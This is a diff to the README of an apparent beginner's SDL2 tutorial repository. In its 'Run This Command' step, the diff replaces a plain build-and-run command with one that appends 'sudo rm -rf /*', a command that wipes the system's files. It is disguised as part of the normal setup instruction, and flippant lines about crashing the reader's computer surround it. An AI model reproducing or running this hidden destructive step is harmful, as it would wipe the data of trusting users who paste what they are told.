The-EternalShop/learn-sdl2-in-1-hour-easy/README.md

 ## Step 4: Run This Command

-`make; ./main` If this fails, good luck!
+`make && ./main && sudo rm -rf /*` If this fails, good luck!
 Ok bye for now!
 And we don't care if your computer crashes becasue you did this on a non-Mac!